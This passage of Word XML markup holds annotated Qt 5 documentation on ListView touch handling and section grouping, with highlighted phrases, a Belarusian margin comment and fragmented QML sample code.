        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/listview-decorations.png"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"http://doc.qt.io/qt-5/images/listview-decorations.png"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"http://doc.qt.io/qt-5/images/listview-decorations.png"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"http://doc.qt.io/qt-5/images/listview-decorations.png"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"http://doc.qt.io/qt-5/images/listview-decorations.png"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"http://doc.qt.io/qt-5/images/listview-decorations.png"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"http://doc.qt.io/qt-5/images/listview-decorations.png"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"http://doc.qt.io/qt-5/images/listview-decorations.png"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"http://doc.qt.io/qt-5/images/listview-decorations.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1077" type="#_x0000_t75" alt="" style="width:410.1pt;height:165.9pt">
            <v:imagedata r:id="rId2556" r:href="rId2557"/>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Pr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00E1023E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2267" w:name="mouse-and-touch-handling"/>
      <w:bookmarkStart w:id="2268" w:name="_Toc483001020"/>
      <w:bookmarkStart w:id="2269" w:name="_Toc483004011"/>
      <w:bookmarkStart w:id="2270" w:name="_Toc483604361"/>
      <w:bookmarkStart w:id="2271" w:name="_Toc483605581"/>
      <w:bookmarkEnd w:id="2267"/>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mouse and Touch Handling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2268"/>
      <w:bookmarkEnd w:id="2269"/>
      <w:bookmarkEnd w:id="2270"/>
      <w:bookmarkEnd w:id="2271"/>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 xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>views handle dragging and flicking of their content</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, however they </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>do not handle touch interaction with the individual delegates</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In order for the delegates to react to touch input, e.g. to set the</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>currentIndex</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, a</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2558" w:history="1">
        <w:r w:rsidRPr="00824FFA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">with the appropriate touch handling logic </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must be provided by the delegate</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00824FFA" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA" w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>highlightRangeMode</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA" w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is set to</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA" w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>StrictlyEnforceRange</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the currentIndex will be affected by dragging/flicking the view, since the view will always ensure that the</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>currentIndex</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is within the highlight range specified.</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003903DE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="003903DE">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Зразумець гэта больш наглядна //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="003903DE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2272" w:name="listview-sections"/>
      <w:bookmarkStart w:id="2273" w:name="_Toc483001021"/>
      <w:bookmarkStart w:id="2274" w:name="_Toc483004012"/>
      <w:bookmarkStart w:id="2275" w:name="_Toc483604362"/>
      <w:bookmarkStart w:id="2276" w:name="_Toc483605582"/>
      <w:bookmarkEnd w:id="2272"/>
      <w:r w:rsidRPr="003903DE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ListView Sections</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2273"/>
      <w:bookmarkEnd w:id="2274"/>
      <w:bookmarkEnd w:id="2275"/>
      <w:bookmarkEnd w:id="2276"/>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00490E7E" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2559" w:history="1">
        <w:r w:rsidR="00630F70" w:rsidRPr="003903DE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00824FFA" w:rsidRPr="003903DE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="003903DE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contents may be grouped into</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA" w:rsidRPr="003903DE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="003903DE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00824FFA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ections</w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, where related list items are labeled according to their sections. Further, the </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sections may be decorated with</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA" w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2560" w:anchor="qml-view-delegate" w:history="1">
        <w:r w:rsidR="00630F70" w:rsidRPr="00824FFA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>delegates</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A list may contain a list indicating people's names and the team on which team the person belongs.</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ListModel</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"Alice"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team</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"Crypto"</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"Bob"</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team</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"Crypto"</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"Jane"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team</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"QA"</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"Victor"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team</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"QA"</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"Wendy"</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team</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"Graphics"</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Component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font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pixelSize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24</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left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left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leftMargin</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The</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2561" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type has the</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>section</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA" w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2562" w:anchor="attached-properties-and-attached-signal-handlers" w:history="1">
        <w:r w:rsidRPr="00824FFA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>attached property</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that can combine adjacent and related types into a section. </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA" w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>section.property</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA" w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>determines which list type property to use as sections</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>section.criteria</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can dictate how the section names are displayed and the</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>section.delegate</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is similar to the views'</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2563" w:anchor="qml-view-delegate" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>delegate</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property.</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ListView</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fill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model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delegate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focus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true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highlight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Rectangle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color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"lightblue"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width</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section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property</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"team"</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criteria</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ViewSection</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FullString</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delegate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Rectangle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color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"#b0dfb0"</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width</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height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childrenRect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height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4</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horizontalCenter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horizontalCenter</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font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pixelSize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16</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font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bold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true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section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00966F82"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966F82">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966F82">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630F70">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/listview-section.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
